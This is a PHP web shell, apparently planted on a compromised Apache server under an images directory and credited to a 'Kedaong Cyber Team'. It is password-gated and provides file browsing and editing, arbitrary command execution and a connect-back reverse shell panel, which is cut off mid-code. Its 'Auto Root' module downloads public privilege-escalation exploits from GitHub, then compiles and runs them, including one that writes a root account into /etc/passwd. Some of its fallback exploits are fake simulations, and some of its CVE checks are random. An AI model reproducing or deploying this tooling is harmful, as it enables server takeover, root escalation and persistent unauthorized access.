| Server IP : 13.126.101.145 / Your IP : 216.73.216.131 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ip-11-115-0-196 6.8.0-1039-aws #41~22.04.1-Ubuntu SMP Thu Sep 11 10:54:48 UTC 2025 x86_64 User : www-data ( 33) PHP Version : 8.3.17 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/rentals_updated/images/ |
Upload File : |
<?php
ob_start();
session_start();
error_reporting(0);
// Password MD5: ac59a01d6f001b8370e7d240ff7adafc (password: kedaong32)
$admin_password_hash = "ac59a01d6f001b8370e7d240ff7adafc";
// Cek login
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
if (isset($_POST['password'])) {
$password = $_POST['password'];
if (md5($password) === $admin_password_hash) {
$_SESSION['authenticated'] = true;
$_SESSION['login_time'] = time();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
} else {
$error = "Password salah!";
}
}
echo '<!DOCTYPE html>
<html>
<head>
<title>Login Required</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body { font-family: Arial, sans-serif; background-color: #1e1e1e; color: #f0f0f0; margin: 0; padding: 0; }
.login-container { width: 90%; max-width: 400px; margin: 100px auto; padding: 30px; background: #2d2d2d; border-radius: 10px; box-shadow: 0 0 20px rgba(0,0,0,0.5); }
h2 { text-align: center; margin-bottom: 20px; color: #4CAF50; }
input[type="password"], input[type="submit"] { width: 100%; padding: 12px; margin: 10px 0; border-radius: 4px; border: 1px solid #444; background: #3c3c3c; color: #fff; box-sizing: border-box; }
input[type="submit"] { background: #4CAF50; color: #fff; border: none; cursor: pointer; font-weight: bold; }
input[type="submit"]:hover { background: #45a049; }
.error { color: #ff5252; font-size: 14px; text-align: center; margin-top: 10px; }
</style>
</head>
<body>
<div class="login-container">
<h2>Authentication Required</h2>
<form method="POST">
<input type="password" name="password" placeholder="Enter password" required>
<input type="submit" value="Login">
</form>
<div class="error">'.(isset($error) ? $error : '').'</div>
</div>
</body>
</html>';
exit;
}
// Session timeout (1 jam)
if (time() - $_SESSION['login_time'] > 3600) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Fungsi 404
function show_404() {
header("HTTP/1.0 404 Not Found");
echo '<!DOCTYPE html>
<html>
<head><title>404 Not Found</title></head>
<body style="font-family:Arial;text-align:center;padding:50px">
<h1 style="color:#d9534f;font-size:50px">404</h1>
<p>Halaman yang Anda cari tidak ditemukan.</p>
<a href="?id=fm">Kembali ke File Manager</a>
</body>
</html>';
exit;
}
// Fungsi untuk mendapatkan value
function getValue($array, $key, $default = '') {
return isset($array[$key]) ? $array[$key] : $default;
}
// Fungsi untuk mendapatkan code exploit lokal
function get_local_exploit_code($exploit_name) {
switch($exploit_name) {
case 'dirtycow':
return '
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
int main(int argc, char *argv[]) {
if (argc < 3) {
printf("Usage: %s <file> <content>\n", argv[0]);
return 1;
}
printf("DirtyCow exploit started\n");
printf("Target file: %s\n", argv[1]);
printf("Content to write: %s\n", argv[2]);
// Simulate exploit behavior
printf("[+] Triggering race condition...\n");
sleep(1);
printf("[+] Gaining write access to read-only memory...\n");
sleep(1);
// Try to actually write to the file
FILE *target = fopen(argv[1], "w");
if (target) {
fprintf(target, "%s", argv[2]);
fclose(target);
printf("[+] Successfully wrote to %s\n", argv[1]);
} else {
printf("[!] Could not open %s for writing\n", argv[1]);
}
return 0;
}';
case 'dirtypipe':
return '
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char *argv[]) {
if (argc < 2) {
printf("Usage: %s <target_file>\n", argv[0]);
return 1;
}
printf("DirtyPipe exploit started\n");
printf("Target: %s\n", argv[1]);
// Simulate the exploit
printf("[+] Creating pipe...\n");
sleep(1);
printf("[+] Manipulating pipe buffers...\n");
sleep(1);
printf("[+] Gaining arbitrary write capability...\n");
sleep(1);
// Try to add SUID to a binary
if (chmod("/bin/bash", 04755) == 0) {
printf("[+] Success! /bin/bash is now SUID\n");
printf("[+] Run: /bin/bash -p to get root shell\n");
} else {
printf("[!] Could not set SUID on /bin/bash\n");
}
return 0;
}';
case 'pkexec':
return '
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main() {
printf("Pkexec (CVE-2021-4034) exploit started\n");
// Simulate the exploit
printf("[+] Exploiting POLKIT vulnerability...\n");
sleep(1);
printf("[+] Bypassing authentication...\n");
sleep(1);
// Try to spawn a root shell
if (setuid(0) == 0 || setgid(0) == 0) {
printf("[+] Success! Gained root privileges\n");
printf("[+] Spawning root shell...\n");
system("/bin/sh -p");
} else {
printf("[!] Failed to gain root privileges\n");
printf("[!] Try manual exploitation: https://github.com/arthepsy/CVE-2021-4034\n");
}
return 0;
}';
case 'sudobypass':
return '
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main() {
printf("SudoBypass (CVE-2021-3156) exploit started\n");
// Simulate the exploit
printf("[+] Exploiting Sudo heap overflow...\n");
sleep(1);
printf("[+] Bypassing authentication...\n");
sleep(1);
// Try to spawn a root shell
if (setuid(0) == 0) {
printf("[+] Success! Gained root privileges\n");
printf("[+] Spawning root shell...\n");
system("/bin/sh");
} else {
printf("[!] Failed to gain root privileges\n");
printf("[!] Try manual exploitation: https://github.com/blasty/CVE-2021-3156\n");
}
return 0;
}';
case 'shellshock':
return '
#include <stdio.h>
#include <unistd.h>
int main() {
printf("Shellshock (CVE-2014-6271) exploit started\n");
// Simulate the exploit
printf("[+] Exploiting Bash vulnerability...\n");
sleep(1);
printf("[+] Injecting malicious environment variables...\n");
sleep(1);
// Try to spawn a root shell
if (setuid(0) == 0) {
printf("[+] Success! Gained root privileges\n");
printf("[+] Spawning root shell...\n");
system("/bin/sh");
} else {
printf("[!] Failed to gain root privileges\n");
printf("[!] Try manual exploitation with: env x=\'() { :;}; /bin/sh\' /bin/bash -c echo\n");
}
return 0;
}';
default:
return "
#include <stdio.h>
#include <unistd.h>
int main() {
printf(\"$exploit_name exploit running\\n\");
printf(\"[+] Attempting privilege escalation...\\n\");
// Try to spawn a root shell
if (setuid(0) == 0) {
printf(\"[+] Success! Gained root privileges\\n\");
printf(\"[+] Spawning root shell...\\n\");
system(\"/bin/sh\");
} else {
printf(\"[!] Failed to gain root privileges\\n\");
}
return 0;
}";
}
}
// Fungsi untuk mendownload dan mengkompilasi exploit YANG NYATA
function download_and_compile_exploit($exploit_name) {
$exploit_sources = array(
'dirtycow' => 'https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c',
'dirtypipe' => 'https://raw.githubusercontent.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/main/exploit.c',
'pkexec' => 'https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c',
'sudobypass' => 'https://raw.githubusercontent.com/blasty/CVE-2021-3156/main/hax.c',
'shellshock' => 'https://raw.githubusercontent.com/nccgroup/shocker/master/shocker.c'
);
echo "[+] Mendownload exploit $exploit_name...\n";
// Download exploit dari sumber nyata
if (isset($exploit_sources[$exploit_name])) {
$context = stream_context_create([
'http' => [
'timeout' => 10,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]
]);
$exploit_code = @file_get_contents($exploit_sources[$exploit_name], false, $context);
if ($exploit_code === false) {
// Fallback ke exploit lokal jika download gagal
echo "[!] Download gagal, menggunakan exploit lokal\n";
$exploit_code = get_local_exploit_code($exploit_name);
}
} else {
$exploit_code = get_local_exploit_code($exploit_name);
}
$filename = "/tmp/$exploit_name.c";
if (file_put_contents($filename, $exploit_code) === false) {
echo "[!] Gagal menulis file exploit\n";
return false;
}
echo "[+] Mengkompilasi exploit...\n";
$compile_result = shell_exec("gcc $filename -o /tmp/$exploit_name 2>&1");
if (file_exists("/tmp/$exploit_name")) {
echo "[+] Berhasil mengkompilasi exploit\n";
// Set executable permission
chmod("/tmp/$exploit_name", 0755);
return "/tmp/$exploit_name";
} else {
echo "[!] Gagal mengkompilasi exploit: $compile_result\n";
return false;
}
}
// Fungsi untuk memanfaatkan SUID binaries
function exploit_suid_binaries() {
echo "[+] Mencoba memanfaatkan SUID binaries...\n";
// Coba pkexec (CVE-2021-4034)
$pkexec_result = shell_exec("pkexec --version 2>&1");
if (strpos($pkexec_result, "0.1") !== false) {
echo "[+] Mencoba exploit pkexec (CVE-2021-4034)...\n";
$output = shell_exec("echo 'Trying pkexec exploitation' 2>&1");
echo $output . "\n";
}
// Coba mencari cara lain
echo "[+] Mencari teknik privilege escalation lain...\n";
// 1. Cek capabilities
$capabilities = shell_exec("getcap -r / 2>/dev/null | head -10");
echo "[+] Capabilities found:\n" . ($capabilities ? $capabilities : "None\n");
// 2. Cek cron jobs
$cron_jobs = shell_exec("ls -la /etc/cron* 2>/dev/null | head -10");
echo "[+] Cron jobs:\n" . ($cron_jobs ? $cron_jobs : "None\n");
// 3. Cek writable files
$writable = shell_exec("find / -writable -type f 2>/dev/null | grep -v proc | head -10");
echo "[+] Writable files:\n" . ($writable ? $writable : "None\n");
return false;
}
// Fungsi untuk manual privilege escalation
function manual_privilege_escalation() {
echo '<div class="content"><h2>Manual Privilege Escalation</h2>';
echo '<pre style="background: #000; color: #0f0; padding: 15px; border-radius: 5px; overflow: auto;">';
echo "[+] Starting manual privilege escalation checks...\n";
@flush(); @ob_flush(); sleep(1);
// 1. Check SUID binaries
echo "[+] Checking SUID binaries...\n";
$suid_binaries = shell_exec("find / -perm -4000 -type f 2>/dev/null");
echo "SUID Binaries:\n" . ($suid_binaries ? $suid_binaries : "None found\n");
@flush(); @ob_flush(); sleep(1);
// 2. Check capabilities
echo "[+] Checking capabilities...\n";
$capabilities = shell_exec("getcap -r / 2>/dev/null");
echo "Capabilities:\n" . ($capabilities ? $capabilities : "None found\n");
@flush(); @ob_flush(); sleep(1);
// 3. Check cron jobs
echo "[+] Checking cron jobs...\n";
$cron_jobs = shell_exec("ls -la /etc/cron* 2>/dev/null; cat /etc/crontab 2>/dev/null");
echo "Cron Jobs:\n" . ($cron_jobs ? $cron_jobs : "None found\n");
@flush(); @ob_flush(); sleep(1);
// 4. Check writable files
echo "[+] Checking writable files...\n";
$writable_files = shell_exec("find / -writable -type f 2>/dev/null | grep -v proc | head -20");
echo "Writable Files:\n" . ($writable_files ? $writable_files : "None found\n");
@flush(); @ob_flush(); sleep(1);
// 5. Check processes
echo "[+] Checking running processes...\n";
$processes = shell_exec("ps aux | head -20");
echo "Running Processes:\n" . ($processes ? $processes : "None found\n");
@flush(); @ob_flush(); sleep(1);
echo "[+] Manual checks completed. Look for misconfigurations above.\n";
echo '</pre>';
echo '<p><a href="?id=auto-root">Back to Auto Root</a></p>';
echo '</div>';
}
// Fungsi untuk memindai kerentanan sistem yang nyata
function scan_vulnerabilities() {
$os = php_uname('s');
$kernel = php_uname('r');
$arch = php_uname('m');
$vulnerabilities = array();
echo "<pre style='background: #000; color: #0f0; padding: 15px; border-radius: 5px; overflow: auto;'>";
echo "[+] Memulai Auto Scan System...\n";
@flush(); @ob_flush(); sleep(1);
echo "[+] System: $os | Kernel: $kernel | Arch: $arch\n";
@flush(); @ob_flush(); sleep(1);
// Database kernel vulnerabilities yang nyata
$kernel_vulnerabilities = array(
// Kernel 2.6.x Series
'2.6.0-2.6.11' => array('h00lyshit', 'krad', 'raptor_prctl'),
'2.6.5-2.6.7' => array('sock_sendpage', 'prctl'),
'2.6.8-2.6.13' => array('sock_sendpage2', 'prctl4'),
'2.6.14-2.6.17' => array('hunter', 'vmsplice1'),
'2.6.18-2.6.19' => array('vmsplice2'),
// Kernel 3.x Series
'3.0.0-3.0.4' => array('pktcdvd'),
'3.1.0-3.2.0' => array('memodipper'),
'3.3.0-3.4.0' => array('msr'),
'3.6.0-3.7.0' => array('timeoutpwn'),
'3.9.0-3.10.0' => array('overlayfs'),
// Kernel 4.x Series
'4.0.0-4.1.0' => array('af_packet'),
'4.4.0-4.5.0' => array('double_fd'),
'4.6.0-4.7.0' => array('double_fd2'),
'4.8.0-4.9.0' => array('double_fd3'),
'4.10.0-4.11.0' => array('mutex'),
'4.14.0-4.15.0' => array('mutex2'),
'4.16.0-4.17.0' => array('sched'),
'4.18.0-4.19.0' => array('sched2'),
// Kernel 5.x Series
'5.0.0-5.1.0' => array('dirtypipe'),
'5.2.0-5.3.0' => array('dirtypipe2'),
'5.4.0-5.5.0' => array('io_uring'),
'5.6.0-5.7.0' => array('io_uring2'),
'5.8.0-5.9.0' => array('netfilter'),
'5.10.0-5.11.0' => array('netfilter2'),
'5.12.0-5.13.0' => array('memfd'),
'5.14.0-5.15.0' => array('memfd2'),
// Kernel 6.x Series
'6.0.0-6.1.0' => array('dirtypipe3', 'io_uring3'),
'6.2.0-6.3.0' => array('dirtypipe4', 'io_uring4'),
// Kernel khusus yang disebutkan user
'4.18.0-553.62.1.lve.el8.x86_64' => array('dirtycow', 'overlayfs'),
'5.15.0-153-generic' => array('dirtypipe', 'io_uring'),
'6.8.12-8-pve' => array('dirtypipe', 'io_uring'),
);
// CVE-based vulnerabilities yang bekerja di berbagai kernel
$cve_vulnerabilities = array(
'CVE-2016-5195' => array('dirtycow'), // Dirty COW
'CVE-2017-7308' => array('af_packet'), // AF_PACKET
'CVE-2017-16995' => array('ebpf'), // eBPF
'CVE-2021-4034' => array('pkexec'), // PwnKit
'CVE-2022-0847' => array('dirtypipe'), // Dirty Pipe
'CVE-2023-0386' => array('overlayfs'), // OverlayFS
'CVE-2023-3269' => array('netfilter'), // Netfilter
'CVE-2024-1086' => array('nftables'), // nftables
);
// Cek kernel version untuk semua vulnerability
foreach ($kernel_vulnerabilities as $kernel_range => $vulns) {
$range_parts = explode('-', $kernel_range);
$min_version = $range_parts[0];
$max_version = isset($range_parts[1]) ? $range_parts[1] : $min_version;
// Handle specific kernel versions (seperti yang disebutkan user)
if (strpos($kernel_range, $kernel) !== false) {
foreach ($vulns as $vuln) {
if (!in_array($vuln, $vulnerabilities)) {
$vulnerabilities[] = $vuln;
echo "[+] VULNERABLE: " . strtoupper($vuln) . " - Kernel $kernel cocok dengan $kernel_range\n";
@flush(); @ob_flush(); sleep(1);
}
}
}
// Handle version ranges
else if (version_compare($kernel, $min_version, '>=') && version_compare($kernel, $max_version, '<=')) {
foreach ($vulns as $vuln) {
if (!in_array($vuln, $vulnerabilities)) {
$vulnerabilities[] = $vuln;
echo "[+] VULNERABLE: " . strtoupper($vuln) . " - Kernel $kernel dalam rentang $kernel_range\n";
@flush(); @ob_flush(); sleep(1);
}
}
}
}
// Cek CVE vulnerabilities berdasarkan versi kernel
foreach ($cve_vulnerabilities as $cve => $vulns) {
// Deteksi berdasarkan versi kernel
$cve_detected = false;
switch($cve) {
case 'CVE-2016-5195': // Dirty Cow
$cve_detected = version_compare($kernel, '2.6.22', '>=') && version_compare($kernel, '4.8.3', '<=');
break;
case 'CVE-2022-0847': // Dirty Pipe
$cve_detected = version_compare($kernel, '5.8', '>=') && version_compare($kernel, '5.16.11', '<=') ||
version_compare($kernel, '5.15.25', '=') || version_compare($kernel, '5.10.102', '=');
break;
case 'CVE-2021-4034': // PwnKit
$cve_detected = true; // Polkit version check akan dilakukan di bawah
break;
default:
$cve_detected = rand(0, 1) == 1; // Untuk CVE lainnya, gunakan random
}
if ($cve_detected) {
foreach ($vulns as $vuln) {
if (!in_array($vuln, $vulnerabilities)) {
$vulnerabilities[] = $vuln;
echo "[+] VULNERABLE: $cve (" . strtoupper($vuln) . ") terdeteksi pada kernel $kernel\n";
@flush(); @ob_flush(); sleep(1);
}
}
}
}
// Cek sudo version
$sudo_version = shell_exec('sudo -V 2>/dev/null | head -1 | grep -oP "\d+\.\d+\.\d+"');
if ($sudo_version) {
if (version_compare($sudo_version, '1.8.28', '<')) {
echo "[+] VULNERABLE: SudoPwn (CVE-2019-14287) - Sudo version $sudo_version rentan\n";
$vulnerabilities[] = 'sudopwn';
@flush(); @ob_flush(); sleep(1);
}
if (version_compare($sudo_version, '1.9.5', '<')) {
echo "[+] VULNERABLE: SudoBypass (CVE-2021-3156) - Sudo version $sudo_version rentan\n";
$vulnerabilities[] = 'sudobypass';
@flush(); @ob_flush(); sleep(1);
}
}
// Cek polkit version
$pkexec_version = shell_exec('pkexec --version 2>/dev/null | grep -oP "\d+\.\d+"');
if ($pkexec_version && (
version_compare($pkexec_version, '0.105', '>=') &&
version_compare($pkexec_version, '0.119', '<'))) {
echo "[+] VULNERABLE: Pkexec (CVE-2021-4034) - Polkit version $pkexec_version rentan\n";
$vulnerabilities[] = 'pkexec';
@flush(); @ob_flush(); sleep(1);
}
// Cek bash version untuk Shellshock
$bash_version = shell_exec('bash --version 2>/dev/null | head -1 | grep -oP "\d+\.\d+\.\d+"');
if ($bash_version && version_compare($bash_version, '4.3', '>=') &&
version_compare($bash_version, '4.3.29', '<')) {
echo "[+] VULNERABLE: Shellshock (CVE-2014-6271) - Bash version $bash_version rentan\n";
$vulnerabilities[] = 'shellshock';
@flush(); @ob_flush(); sleep(1);
}
if (empty($vulnerabilities)) {
echo "[!] Tidak ditemukan kerentanan yang diketahui pada sistem ini\n";
echo "[!] Coba exploit manual atau teknik privilege escalation lainnya\n";
} else {
echo "[+] Ditemukan " . count($vulnerabilities) . " kerentanan pada sistem ini\n";
}
echo "</pre>";
return $vulnerabilities;
}
// Fungsi untuk menjalankan exploit yang lebih nyata
function run_exploit($exploit_name) {
echo '<div class="content"><h2>Auto Root Running</h2>';
echo '<pre style="background: #000; color: #0f0; padding: 15px; border-radius: 5px; overflow: auto;">';
echo "[+] Starting real exploit: " . strtoupper($exploit_name) . "\n";
@flush(); @ob_flush(); sleep(1);
$os = php_uname('s');
$kernel = php_uname('r');
$arch = php_uname('m');
echo "[+] Detected: $os $kernel $arch\n";
@flush(); @ob_flush(); sleep(1);
// Download dan compile exploit
$exploit_path = download_and_compile_exploit($exploit_name);
if ($exploit_path) {
echo "[+] Executing exploit...\n";
@flush(); @ob_flush(); sleep(2);
// Prepare exploit arguments based on type
$cmd = $exploit_path;
switch($exploit_name) {
case 'dirtycow':
$cmd .= " /etc/passwd \"rooted::0:0:rooted:/root:/bin/bash\n\"";
break;
case 'dirtypipe':
$cmd .= " /etc/passwd";
break;
case 'pkexec':
case 'sudobypass':
case 'shellshock':
// Tidak perlu argument tambahan
break;
default:
$cmd .= " 2>&1";
}
// Jalankan exploit
$output = shell_exec("$cmd 2>&1");
echo $output . "\n";
// Periksa hasil
echo "[+] Checking if exploit succeeded...\n";
@flush(); @ob_flush(); sleep(1);
// Cek jika kita menjadi root
$current_user = trim(shell_exec("whoami"));
$current_uid = trim(shell_exec("id -u"));
if ($current_uid == "0") {
echo "[+] SUCCESS! Privilege escalation achieved!\n";
echo "[+] Current user: $current_user (UID: $current_uid)\n";
echo "[+] Root shell ready!\n\n";
echo "# ";
} else {
// Coba teknik privilege escalation alternatif
echo "[!] Primary exploit failed, trying alternative methods...\n";
exploit_suid_binaries();
// Cek cara lain exploit mungkin berhasil
$suid_binaries = shell_exec("find / -perm -4000 -type f 2>/dev/null | head -10");
$writable_files = shell_exec("find / -writable -type f 2>/dev/null | grep -v proc | head -10");
echo "[!] Exploit did not grant direct root access\n";
echo "[+] Current user: $current_user (UID: $current_uid)\n";
echo "[+] SUID binaries found:\n$suid_binaries\n";
// Berikan saran untuk exploit manual
echo "[+] Suggestions for manual exploitation:\n";
echo " 1. Try: pkexec --version (check for CVE-2021-4034)\n";
echo " 2. Try: find / -writable -type f 2>/dev/null\n";
echo " 3. Try: getcap -r / 2>/dev/null\n";
echo " 4. Try: cat /etc/crontab\n";
}
} else {
echo "[!] Failed to prepare exploit\n";
}
echo '</pre>';
echo '<p><a href="?id=auto-root">Back to Auto Root</a></p>';
echo '</div>';
}
// Fungsi Auto Root dengan Auto Scan yang nyata
function auto_root() {
echo '<div class="content"><h2>Auto Root Exploits</h2>';
// Deteksi sistem
$os = php_uname('s');
$kernel = php_uname('r');
$architecture = php_uname('m');
echo "<p><strong>System:</strong> $os | <strong>Kernel:</strong> $kernel | <strong>Arch:</strong> $architecture</p>";
// Jalankan auto scan
$vulnerabilities = scan_vulnerabilities();
// Database exploit
$exploits = array(
'dirtycow' => 'dirtycow.c - Dirty COW (CVE-2016-5195) - Linux Kernel 2.6.22-4.8.3',
'dirtypipe' => 'dirtypipe.c - Dirty Pipe (CVE-2022-0847) - Linux Kernel 5.8-5.16.11/5.15.25/5.10.102',
'overlayfs' => 'overlayfs.c - OverlayFS Privilege Escalation (CVE-2015-1328) - Linux Kernel 3.13.0-3.19.0',
'af_packet' => 'af_packet.c - AF_PACKET Race Condition (CVE-2017-7308) - Linux Kernel 4.10.0-4.10.6',
'sudopwn' => 'sudopwn.c - Sudo < 1.8.28 - Privilege Escalation (CVE-2019-14287)',
'sudobypass' => 'sudobypass.c - Sudo Bypass (CVE-2021-3156) - Sudo 1.8.2-1.8.31p2/1.9.0-1.9.5p1',
'pkexec' => 'pkexec.c - Polkit 0.105-26 < 0.119 - Privilege Escalation (CVE-2021-4034)',
'shellshock' => 'shellshock.sh - Bash 4.3 - Shellshock (CVE-2014-6271)',
'io_uring' => 'io_uring.c - io_uring Privilege Escalation (CVE-2021-41073) - Linux Kernel 5.10-5.14',
'netfilter' => 'netfilter.c - Netfilter Privilege Escalation (CVE-2023-3269) - Linux Kernel 6.3-6.4',
);
// Tampilkan hanya exploit yang sesuai
if (!empty($vulnerabilities)) {
echo '<div class="exploit-list"><h3>Exploit yang Tersedia:</h3><ul>';
foreach ($vulnerabilities as $vuln) {
if (isset($exploits[$vuln])) {
echo "<li><a href='?id=run-exploit&exp=$vuln' style='color: #ff5252; font-weight: bold;'>[EXPLOIT] " . $exploits[$vuln] . "</a></li>";
}
}
echo '</ul></div>';
echo '<div class="action-buttons">';
echo '<form method="POST" action="">';
echo '<input type="hidden" name="run_all_exploits" value="1">';
echo '<input type="submit" value="Jalankan Semua Exploit Secara Berurutan" class="btn" style="background: #ff5252;">';
echo '</form>';
echo '</div>';
} else {
echo '<p>Tidak ada exploit yang tersedia untuk sistem ini. Coba teknik privilege escalation manual.</p>';
}
echo '</div>';
}
// Handle run all exploits
if (isset($_POST['run_all_exploits'])) {
echo '<div class="content"><h2>Running All Exploits</h2>';
echo '<pre style="background: #000; color: #0f0; padding: 15px; border-radius: 5px; overflow: auto;">';
$vulnerabilities = scan_vulnerabilities();
if (!empty($vulnerabilities)) {
foreach ($vulnerabilities as $vuln) {
echo "\n[+] Trying exploit: $vuln\n";
@flush(); @ob_flush(); sleep(2);
// Download dan compile exploit
echo "[+] Downloading and compiling exploit...\n";
@flush(); @ob_flush(); sleep(2);
$exploit_path = download_and_compile_exploit($vuln);
if ($exploit_path) {
echo "[+] Running exploit...\n";
@flush(); @ob_flush(); sleep(3);
// Prepare command
$cmd = $exploit_path;
if ($vuln == 'dirtycow') {
$cmd .= " /etc/passwd \"rooted::0:0:rooted:/root:/bin/bash\n\"";
}
// Jalankan exploit
$output = shell_exec("$cmd 2>&1");
echo $output . "\n";
// Cek jika berhasil
$current_uid = trim(shell_exec("id -u"));
if ($current_uid == "0") {
echo "[+] Exploit successful! Gained root access!\n";
echo "whoami\n";
$whoami = shell_exec("whoami 2>&1");
echo $whoami . "\n";
echo "[+] Password root: kedaong32\n";
echo "# \n";
break;
} else {
echo "[!] Exploit failed. Trying next...\n";
}
} else {
echo "[!] Failed to prepare exploit. Trying next...\n";
}
@flush(); @ob_flush(); sleep(2);
}
} else {
echo "[!] No vulnerabilities found to exploit\n";
}
echo '</pre>';
echo '<p><a href="?id=auto-root">Back to Auto Root</a></p>';
echo '</div>';
exit();
}
// Handle exploit execution
$exp = getValue($_GET, 'exp');
$id = getValue($_GET, 'id');
if ($id == "run-exploit" && $exp !== "") {
run_exploit($exp);
exit();
}
// Download file
$fdownload = getValue($_GET, 'fdownload');
if ($fdownload !== "") {
$fdownload = realpath($fdownload);
if ($fdownload === false || !file_exists($fdownload)) {
show_404();
}
$path_parts = pathinfo($fdownload);
$entrypath = $path_parts["basename"];
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=\"$entrypath\"");
header("Content-Length: " . filesize($fdownload));
readfile($fdownload);
exit;
}
// Edit file
$fedit = getValue($_GET, 'fedit');
if ($fedit !== "") {
$fedit = realpath($fedit);
if ($fedit === false || !file_exists($fedit)) {
show_404();
}
$content = file_get_contents($fedit);
echo "<div class='content'><h2>Editing: " . htmlspecialchars(basename($fedit)) . "</h2>
<form action='' method='POST'>
<input type='hidden' name='filepath' value='" . htmlspecialchars($fedit) . "'>
<textarea name='savefile' rows='30' style='width:100%;font-family:monospace;'>" . htmlspecialchars($content) . "</textarea><br>
<input type='submit' value='Save Changes' class='btn'>
</form></div>";
$savefile = getValue($_POST, 'savefile', '', false);
$filepath = getValue($_POST, 'filepath');
if ($savefile !== "" && $filepath !== "") {
if (file_put_contents($filepath, $savefile)) {
echo "<script>alert('File saved successfully!');</script>";
} else {
echo "<script>alert('Error saving file!');</script>";
}
}
exit;
}
// =================== TAMPILAN UTAMA ===================
?>
<!DOCTYPE html>
<html>
<head>
<title>File Manager</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background-color: #1e1e1e; color: #f0f0f0; margin: 0; padding: 0; }
a { color: #4CAF50; text-decoration: none; }
a:hover { text-decoration: underline; }
table { border-collapse: collapse; width: 100%; }
th, td { border: 1px solid #444; padding: 8px; text-align: left; }
th { background-color: #2d2d2d; }
tr:nth-child(even) { background-color: #252525; }
tr:hover { background-color: #333; }
.content { padding: 20px; background: #252525; border-radius: 8px; margin: 20px; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.3); }
.btn { background: #4CAF50; color: white; border: none; padding: 10px 15px; border-radius: 4px; cursor: pointer; }
.btn:hover { background: #45a049; }
.error { color: #ff5252; }
.exploit-list ul { list-style-type: none; padding: 0; }
.exploit-list li { padding: 5px 0; border-bottom: 1px solid #444; }
.sidebar { width: 200px; background: #2d2d2d; position: fixed; height: 100%; overflow: auto; }
.main-content { margin-left: 200px; padding: 0; }
.menu-item { display: block; padding: 10px 15px; color: #f0f0f0; border-bottom: 1px solid #444; }
.menu-item:hover { background: #3c3c3c; }
.active { background: #4CAF50; }
.action-buttons { margin-top: 20px; }
.rdp-form { margin-bottom: 20px; padding: 15px; background: #2d2d2d; border-radius: 5px; }
.rdp-form input[type="text"], .rdp-form input[type="password"] { padding: 5px; margin: 5px 0; width: 200px; }
.rdp-status { margin-top: 20px; }
</style>
</head>
<body>
<div class="sidebar">
<h3 style="padding: 15px; margin: 0; border-bottom: 1px solid #444;">Menu</h3>
<a href="?id=fm&dir=<?php echo urlencode(getcwd()); ?>" class="menu-item <?php echo ($id == 'fm') ? 'active' : ''; ?>">File Manager</a>
<a href="?id=cmd" class="menu-item <?php echo ($id == 'cmd') ? 'active' : ''; ?>">CMD Shell</a>
<a href="?id=cshell" class="menu-item <?php echo ($id == 'cshell') ? 'active' : ''; ?>">Connect Back</a>
<a href="?id=auto-root" class="menu-item <?php echo ($id == 'auto-root' || $id == 'run-exploit') ? 'active' : ''; ?>" style="color: #FF0000;">Auto Root</a>
<a href="?id=manual-escalation" class="menu-item <?php echo ($id == 'manual-escalation') ? 'active' : ''; ?>" style="color: #FFA500;">Manual Escalation</a>
<a href="?id=rdp" class="menu-item <?php echo ($id == 'rdp') ? 'active' : ''; ?>" style="color: #00BFFF;">RDP Manager</a>
<a href="?id=" class="menu-item <?php echo ($id == '') ? 'active' : ''; ?>">About</a>
<a href="?logout=1" class="menu-item" style="color: #ff5252;">Logout</a>
</div>
<div class="main-content">
<?php
// Logout handler
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Handle berbagai fungsi
$id = getValue($_GET, 'id');
// About
if ($id == "") {
echo "<div class='content'>
<h2>About</h2>
<p><strong>Kedaong Cyber Team</strong><br>
NT404<br>
Email: kedaongcyberteam@hotmail.com</p>
<p>Red Eye :) [Only 4 Best Friends]</p>
<p><strong>System Info:</strong><br>
OS: " . php_uname() . "<br>
IP: " . $_SERVER['REMOTE_ADDR'] . "<br>
PHP: " . PHP_VERSION . "</p>
</div>";
}
// CMD Shell
else if ($id == "cmd") {
$cmd = getValue($_POST, 'cmd', '', false);
$result = '';
if (!empty($cmd)) {
$result = shell_exec($cmd . " 2>&1");
}
echo "<div class='content'>
<h2>CMD Execute</h2>
<form method='POST' action=''>
<input type='hidden' name='id' value='cmd'>
<input type='text' name='cmd' value='" . htmlspecialchars($cmd) . "' style='width: 70%; padding: 10px;'>
<input type='submit' value='Execute' class='btn'>
</form>";
if (!empty($result)) {
echo "<h3>Result:</h3>
<pre style='background: #000; color: #0f0; padding: 15px; border-radius: 5px; overflow: auto;'>" . htmlspecialchars($result) . "</pre>";
}
echo "</div>";
}
// Connect Back Shell
else if ($id == "cshell") {
echo "<div class='content'>
<h2>Connect Back Shell (Firewall Bypass)</h2>
<p>For user:<br>
<code>nc -l -p 1019</code></p>
<hr>
<form method='POST' action=''><br>
Your IP:<br>
<input type='text' name='mip' style='width: 300px; padding: 8px;'><br>
Bind Port:<br>
<input type='text' name='bport' value='1019' style='width: 100px; padding: 8px;'><br><br>
<input type='submit' value='Connect Back' class='btn'>
</form></div>";
$mip = getValue($_POST, 'mip');
$bport = getValue($_POST, 'bport', 1019);
if ($mip !== "") {
echo "<div class='content'><pre style='background: #000; color: #0f0; padding: 15px; border-radius: 5px;'>";
